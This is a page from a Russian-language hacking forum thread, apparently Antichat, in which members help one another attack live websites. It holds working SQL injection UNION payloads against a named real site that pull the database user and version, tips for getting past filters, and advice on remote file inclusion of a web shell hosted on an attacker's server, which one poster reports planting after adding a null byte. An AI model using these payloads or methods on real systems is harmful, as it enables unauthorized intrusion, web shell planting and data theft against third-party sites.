Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    $a = $_GET["req"];
    SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a
    Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е.
    Code:
    SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2
    и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же
    Code:
    SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2
    в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ.
     
    _________________________
  2. villagay

    villagay Banned

    Joined:
    7 Jan 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    помогите раскуртить
    http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
    http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
     
  3. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    собственно в чем проблема?
    Code:
    http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
     
    _________________________
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    проблема в том что статьи про скули разучились читать(
     
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ну тут два варианта, либо это RFI, либо просто фрейм.
    В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел.
    Так что дай больше информации
     
    _________________________
  6. Onkelz

    Onkelz New Member

    Joined:
    22 Sep 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    -1
    РОсширение .php.
    НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
     
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
    Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
     
    _________________________
  8. iget

    iget New Member

    Joined:
    29 Mar 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
     
  9. Onkelz

    Onkelz New Member

    Joined:
    22 Sep 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    -1
    До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь.

    UPD: Залил) помогло добавления нулл байта после .txt)
    СПасибо за помощь! Лови +
     
    #15829 Onkelz, 9 Jan 2011
    Last edited: 9 Jan 2011
  10. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    GetEngine.pl - скрипт для определения имени\версии движка
    ТиЦ
     
    _________________________
    1 person likes this.
  11. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подскажите как обойти фильтрацию минуса
    делаю
    поля версии не видно
    делаю
    перенаправляет на главную страницу
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    limit+1,1
     
    1 person likes this.
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    noviyuser

    зафелси запрос более мягко,

    and+1!=1
    and+1>2
    and+verson()=user()
    и тп.

    если видны ошибки мускула, попробуй эррор бейсд.
     
    _________________________
    1 person likes this.
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ну по всей же видимости
    Code:
    id=1+and+1=0+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+
    да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.
     
    _________________________
    #15834 Expl0ited, 11 Jan 2011
    Last edited: 11 Jan 2011
    1 person likes this.
  15. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
    ни один из способов не помог
    вроде не слепая пробовал
    and+substring(@@version,1,1)=4
    and+substring(@@version,1,1)=5

    пробовал и так и так
    id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9
    id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+
    id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+

    если ставлю кавычку или минус перенаправляет
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    link pls
     
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    а как ты пришел к выводу, что там 19 полей?
     
    _________________________
  18. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    order+by+19

    на таком перенаправляет
    order+by+20
    id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,20
    тоже перенаправляет

    null тоже не помогает
     
    #15838 noviyuser, 11 Jan 2011
    Last edited: 11 Jan 2011
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    замени цифры на null

    [upd] тогда кидай линк.
     
    _________________________
    #15839 Expl0ited, 11 Jan 2011
    Last edited: 11 Jan 2011
  20. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Глупый вопрос:
    если я делаю запрос
    Code:
    www.xxx.ru/auth.php?id=1'
    ничего не происходит, открывает ту же самою страницу,
    То есть ' фильтруется?

    /// Мдаа...
     
    #15840 cheater_man, 11 Jan 2011
    Last edited by a moderator: 11 Jan 2011
Thread Status:
Not open for further replies.